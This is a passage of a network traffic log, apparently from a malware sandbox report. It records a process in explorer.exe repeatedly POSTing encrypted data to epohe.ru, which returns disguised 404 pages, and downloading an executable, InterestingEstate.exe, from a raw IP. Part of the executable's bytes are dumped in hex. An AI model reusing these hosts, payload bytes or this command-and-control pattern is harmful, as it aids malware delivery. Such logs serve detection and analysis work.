Sep 1, 2024 18:27:43.794398069 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	56159	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:43.806938887 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rkcekbquuaot.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 312 Host: epohe.ru
Sep 1, 2024 18:27:43.806972027 CEST	312	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 2a 3d bd a4 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vu=fPdS_$d~'5FyVf@1t(/I5D"\|DYG3,]i(\|>y hU61:\|uKd^k8hWx~%(!
Sep 1, 2024 18:27:45.058583975 CEST	204	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5f 24 14 a6 60 44 aa ae 1e bd ca b6 e5 12 9c 21 c1 f7 6c 73 1b 98 8f 9d cb 77 c0 37 1b 14 ba 11 9e 58 72 56 1a b8 83 70 Data Ascii: #\ _$`D!lsw7XrVp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	56160	94.228.169.44	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:45.066401005 CEST	178	OUT	GET /Photo/InterestingEstate.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 94.228.169.44
Sep 1, 2024 18:27:45.710235119 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:27:45 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sat, 31 Aug 2024 18:50:16 GMT ETag: "1ba703-620ff2db74a00" Accept-Ranges: bytes Content-Length: 1812227 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 4b 5a 65 25 2a 34 36 25 2a 34 36 25 2a 34 36 2c 52 b7 36 26 2a 34 36 2c 52 a7 36 34 2a 34 36 25 2a 35 36 89 2a 34 36 3e b7 9e 36 2b 2a 34 36 3e b7 ae 36 24 2a 34 36 3e b7 a9 36 24 2a 34 36 52 69 63 68 25 2a 34 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 cf e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 70 00 00 00 94 3e 00 00 42 00 00 99 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 d0 4b 00 00 04 00 00 06 6b 1c 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$aKZe%46%46%46,R6&46,R6446%5646>6+46>6$46>6$46Rich%46PELGOp>B8@Kk@40G[~X(?H.textop `.rdatab,t@@.dataf>@.ndata ?.rsrc[0G\@@.reloc2K4n@B
Sep 1, 2024 18:27:45.710254908 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: U\}t+}FEuHHPuuu@KSV5WEPu@eEEPu@}eD@FRVVU
Sep 1, 2024 18:27:45.710263968 CEST	1236	IN	Data Raw: e8 8b cf 2b 4d e8 0f af c1 03 c2 99 f7 ff 89 4d 10 0f b6 c0 c1 e0 08 89 45 14 0f b6 46 51 0f af c1 0f b6 4e 55 0f af 4d e8 03 c1 99 f7 ff 8b 4d 14 0f b6 56 54 0f af 55 e8 0f b6 c0 0b c8 0f b6 46 50 0f af 45 10 03 c2 99 f7 ff c1 e1 08 0f b6 c0 0b Data Ascii: +MMEFQNUMMVTUFPEEPMH@EPEEPu@uE9}n~Xtev4L@EtU}jWEEP@vXWT@u5X@Wh EEPjh~W@uWu
Sep 1, 2024 18:27:45.710364103 CEST	224	IN	Data Raw: df 55 8b ec a1 c4 b0 40 00 8b 40 04 56 85 c0 74 04 8b f0 eb 0c 8b 35 a4 16 7f 00 81 c6 01 00 00 80 8d 45 08 50 a1 d0 16 7f 00 0b 45 08 50 6a 00 6a 22 e8 d3 fe ff ff 50 56 ff 15 04 80 40 00 f7 d8 1b c0 f7 d0 23 45 08 5e 5d c2 04 00 cc 55 8b ec 81 Data Ascii: U@@Vt5EPEPjj"PV@#E^]USVuWjY}UMi@i@E E@E3]G$0@Rh@LEYYS@Ph@LYYSuV9
Sep 1, 2024 18:27:45.710375071 CEST	1236	IN	Data Raw: b8 ff ff ff 7f e9 b2 1a 00 00 ff 05 b4 95 7e 00 39 5d f4 74 eb 53 ff 15 3c 82 40 00 eb e2 52 e8 28 fd ff ff 8d 70 ff 56 68 80 8f 40 00 e8 55 4c 00 00 59 59 53 56 e8 30 fd ff ff e9 7c 1a 00 00 53 e8 e4 fd ff ff 50 68 60 8f 40 00 e8 36 4c 00 00 59 Data Ascii: ~9]tS<@R(pVh@ULYYSV0\|SPh`@6LYYSu8P3VhL@LYY3FV@&h0@KYu@@9]u%`3ASM`u43;
Sep 1, 2024 18:27:45.710386038 CEST	1236	IN	Data Raw: 00 56 68 00 20 7f 00 e8 0d 45 00 00 ff 75 e8 68 d0 f0 40 00 e8 fc 4c 00 00 57 68 00 20 7f 00 e8 f5 44 00 00 8b 45 d4 c1 f8 03 50 68 d0 f0 40 00 e8 7b 41 00 00 83 e8 04 75 10 68 70 8b 40 00 e8 6f 47 00 00 59 e9 36 ff ff ff 48 74 40 68 40 8b 40 00 Data Ascii: Vh Euh@LWh DEPh@{Auhp@oGY6Ht@h@@\GYVjuj4}uEuVh@.GPh@GYCuj3SSuuVWh@F}u}tEPSPu`@
Sep 1, 2024 18:27:45.710397959 CEST	868	IN	Data Raw: f8 52 51 53 ff 75 08 ff 75 cc 50 57 ff 15 4c 82 40 00 f7 d8 1b c0 40 89 45 fc eb 43 ff 75 08 ff 75 cc 50 57 ff 15 88 82 40 00 eb 30 6a 01 e8 4f f4 ff ff 6a 12 8b f8 e8 46 f4 ff ff 0f b7 08 f7 d9 1b c9 23 c8 0f b7 07 f7 d8 51 1b c0 23 c7 50 ff 75 Data Ascii: RQSuuPWL@@ECuuPW@0jOjF#Q#Puu@E9]u3Pl@sUjY3PAPp@Z(Pj3Pt@DQup@EPV@EEjPEEPSS
Sep 1, 2024 18:27:45.710412979 CEST	1236	IN	Data Raw: 00 50 ff 75 f0 53 ff 75 bc e8 c4 5b 00 00 85 c0 74 34 8d 45 bc 50 8d 45 f8 50 68 38 88 40 00 ff 75 08 e8 a5 5b 00 00 85 c0 74 1b 8b 45 f8 ff 70 08 56 e8 f2 3b 00 00 8b 45 f8 ff 70 0c 57 e8 e6 3b 00 00 89 5d fc ff 75 08 ff 15 30 81 40 00 e9 51 0d Data Ascii: PuSu[t4EPEPh8@u[tEpV;EpW;]u0@Qjh VWgNuEVWh@jh VWNuEVWh@E9jRjIE9]tW4@E;ujSW8
Sep 1, 2024 18:27:45.710714102 CEST	1236	IN	Data Raw: 40 00 56 68 d8 30 41 00 ff 75 08 89 45 ec 68 50 85 40 00 e8 8f 3a 00 00 83 c4 10 57 ff 15 08 80 40 00 eb 3c 6a 22 e8 1f ec ff ff 8b f0 56 ff 75 08 68 24 85 40 00 e8 6c 3a 00 00 8b 45 d8 83 c4 0c 3b c3 75 0a a1 a4 16 7f 00 05 01 00 00 80 8b 4d e4 Data Ascii: @Vh0AuEhP@:W@<j"Vuh$@l:E;uMQVP.E9]h;t=EEEjEjEWE9YSEEPSPSSSu3FWu@]0A9uuBj#`W37Wu
Sep 1, 2024 18:27:45.710725069 CEST	448	IN	Data Raw: 8c f8 03 00 00 b9 03 20 00 00 3b c1 7e 03 89 4d f8 66 39 1e 0f 84 7b ff ff ff 56 89 5d cc e8 77 32 00 00 89 45 bc 39 5d f8 0f 8e 66 ff ff ff 8b f3 53 8d 45 ec 50 6a 02 8d 45 08 50 ff 75 bc ff 15 58 81 40 00 85 c0 0f 84 4a ff ff ff 83 7d ec 02 0f Data Ascii: ;~Mf9{V]w2E9]fSEPjEPuX@J}@9]u0f}t2f}t+fEfwFMf;;u\|EfEf9EtffjSjf97uSjYPV1P`@9]PWf9
Sep 1, 2024 18:27:45.715323925 CEST	1236	IN	Data Raw: 89 45 bc ff d6 8b f8 3b fb 74 7b 53 e8 b1 04 00 00 ff 75 bc 57 e8 76 04 00 00 ff 75 dc 6a 40 ff d6 8b f0 89 75 f0 3b f3 74 34 ff 75 dc 56 53 ff 75 d8 e8 a2 04 00 00 eb 18 8b 0e 8b 46 04 51 83 c6 08 56 03 c7 50 89 4d c8 e8 2e 2f 00 00 03 75 c8 38 Data Ascii: E;t{SuWvuj@u;t4uVSuFQVPM./u8uu0@SEPuWuT@W0@SSujVEu@uuh$@t3j^9]}j^up@EVu;t<Qh@<3EPh@X})39]t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	56161	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:47.324671984 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tofeflnxucwecrre.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 149 Host: epohe.ru
Sep 1, 2024 18:27:47.324704885 CEST	149	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1a 6b 2c 90 f4 76 0b 75 32 5f a0 a4 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA ,[k,vu2_\MQR`1H;x,ynZ^i\4@UJf.JFTX[
Sep 1, 2024 18:27:48.593642950 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	56162	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:48.605501890 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://txqhuiqicbyfe.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 187 Host: epohe.ru
Sep 1, 2024 18:27:48.605535030 CEST	187	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 51 39 e2 81 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vuQ9#Ca`G\/')tj<>Ev<$U_/K\|NH*v)313
Sep 1, 2024 18:27:50.132550955 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	56164	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:50.142952919 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ymvbvdmfmfqso.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: epohe.ru
Sep 1, 2024 18:27:50.142968893 CEST	131	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 3f 0f a5 e8 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vu?OxnUu>=c0L_ItLj
Sep 1, 2024 18:27:51.384614944 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	56165	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:51.393023014 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ayhvajmivgmmac.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 320 Host: epohe.ru
Sep 1, 2024 18:27:51.393035889 CEST	320	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 34 5f c0 8a Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vu4_z]z}m!8x1?f/!;u.;O>3Q4 lmlB;-`U"(T+LZ\|LH.awe,3
Sep 1, 2024 18:27:52.654377937 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	56166	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:52.662849903 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sedmabhbgvobvj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 152 Host: epohe.ru
Sep 1, 2024 18:27:52.662873030 CEST	152	OUT	Data Raw: 3b 6e 21 16 f7 bb 1d 53 d6 a3 c8 70 0e 70 7f cc 7c 0b ba e2 6f 05 90 63 0c 7a 73 97 48 cb b2 6d 9f 29 c1 2f 06 6d 24 11 ed 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 6f 35 ca 96 Data Ascii: ;n!Spp\|oczsHm)/m$? 9Yt M@NA -[k,vuo5M'm\|cJ+p/c?s{R#e>1VNF*%NoN)AM
Sep 1, 2024 18:27:53.914314032 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 01 Sep 2024 16:27:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	56167	191.191.224.16	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 18:27:54.110460043 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vholdxjhiek.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 254 Host: epohe.ru
